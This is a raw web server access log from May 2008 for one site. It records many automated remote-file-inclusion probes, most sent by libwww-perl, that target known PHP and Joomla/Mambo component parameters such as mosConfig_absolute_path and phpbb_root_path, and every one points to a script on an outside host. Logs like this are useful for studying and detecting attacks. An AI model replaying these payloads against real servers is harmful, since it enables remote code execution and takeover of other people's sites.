85.119.240.143 - - [24/May/2008:12:45:11 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:45:12 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:45:19 -0700] "GET /logs/access_080111.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:45:19 -0700] "GET /logs/access_080104.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:45:21 -0700] "GET /logs/access_071227.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:45:21 -0700] "GET /logs/access_080107.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:45:29 -0700] "GET /index.php?meio=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:45:39 -0700] "GET /logs/index.php?incl=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:45:47 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:45:47 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:45:51 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:45:53 -0700] "GET /index.php?incl=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.69" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:45:55 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:45:58 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:46:07 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:46:17 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:46:24 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:46:28 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:46:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:46:29 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:46:40 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp:/84.32.137.157/incoming/upload/trex/index.php?option=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:46:54 -0700] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:46:54 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:46:55 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:47:13 -0700] "GET /logs/access.log/index.php?incl=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:47:13 -0700] "GET /logs/access_080117.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:47:15 -0700] "GET /logs/access_080223.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:47:27 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:47:32 -0700] "GET /logs/access_071222.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:47:39 -0700] "GET /logs/access_080327.log//class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:48:01 -0700] "GET /logs//Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [24/May/2008:12:48:01 -0700] "GET //Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.blasterwb.com/publicidad/transervice_no/imagok/imagok/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:06 -0700] "GET /logs/access_080211.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:07 -0700] "GET /logs/access_080207.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:19 -0700] "GET /logs/access_080312.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:24 -0700] "GET /logs/access_080311.log//skin/nzeo_ver3/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:25 -0700] "GET //skin/nzeo_ver3/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:25 -0700] "GET /logs//skin/nzeo_ver3/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:48:32 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:48:32 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:48:36 -0700] "GET /logs/access_080112.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:49:09 -0700] "GET /logs/access_080212.log/index.php?incl=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:49:15 -0700] "GET /logs/access_080129.log/main.php?appserv_root=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:49:15 -0700] "GET /logs/main.php?appserv_root=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:49:18 -0700] "GET /logs/access.log/index.php?meio=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:49:23 -0700] "GET /logs/index.php?meio=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:49:23 -0700] "GET /index.php?meio=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:49:37 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:49:43 -0700] "GET /?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:49:43 -0700] "GET /logs/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:49:47 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:12:49:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:12:49:50 -0700] "GET /logs/access_080329.log/index2.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:12:49:50 -0700] "GET /logs/index2.php?content=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:49:51 -0700] "GET /logs/access_080102.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:49:58 -0700] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:50:08 -0700] "GET /logs/access_080125.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:22 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:28 -0700] "GET /logs/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:28 -0700] "GET /?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.227 - - [24/May/2008:12:50:28 -0700] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:50:34 -0700] "GET /logs/access_080213.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:50:34 -0700] "GET /logs/access_080126.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:37 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:42 -0700] "GET /logs/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:42 -0700] "GET /?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:45 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:50 -0700] "GET /logs/?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:12:50:51 -0700] "GET /?mosConfig_absolute_path=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:50:54 -0700] "GET /logs/access_080103.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:51:00 -0700] "GET /logs/access_080306.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:51:02 -0700] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:51:02 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:51:08 -0700] "GET /logs/index.php?meio=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:51:13 -0700] "GET /logs/access_080118.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.138.183 - - [24/May/2008:12:51:14 -0700] "GET /index.php?meio=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:51:26 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:51:31 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:51:33 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:51:44 -0700] "GET /logs/access_080218.log/convert/mvcw.php?vwar_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:51:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.62.80.134 - - [24/May/2008:12:51:52 -0700] "GET //skin/zero_vote/error.php?dir=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:12:52:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/May/2008:12:52:05 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%20http://www.crazywap.co.uk/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:52:12 -0700] "GET /index.php?redir=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:52:39 -0700] "GET /displayCategory.php?adminpath=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:52:40 -0700] "GET /logs/displayCategory.php?adminpath=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:52:46 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:52:48 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:52:57 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:53:05 -0700] "GET /logs/access_080126.log/displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:53:10 -0700] "GET /logs/displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:53:11 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:53:11 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:53:16 -0700] "GET /logs/access.log/displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:53:20 -0700] "GET /logs/displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:53:20 -0700] "GET /displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:53:24 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [24/May/2008:12:53:24 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:53:28 -0700] "GET /displayCategory.php?adminpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:12:53:50 -0700] "GET /logs/trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:12:53:50 -0700] "GET /trans.php?trans=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.138.224.8 - - [24/May/2008:12:54:03 -0700] "GET /logs/access_080313.log/main.php?appserv_root=http://www.b470-killer.kit.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:54:15 -0700] "GET /logs/access_080120.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:54:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:54:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:12:54:36 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:54:56 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:12:54:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:02 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:02 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:02 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:02 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:12:55:03 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:12:55:03 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
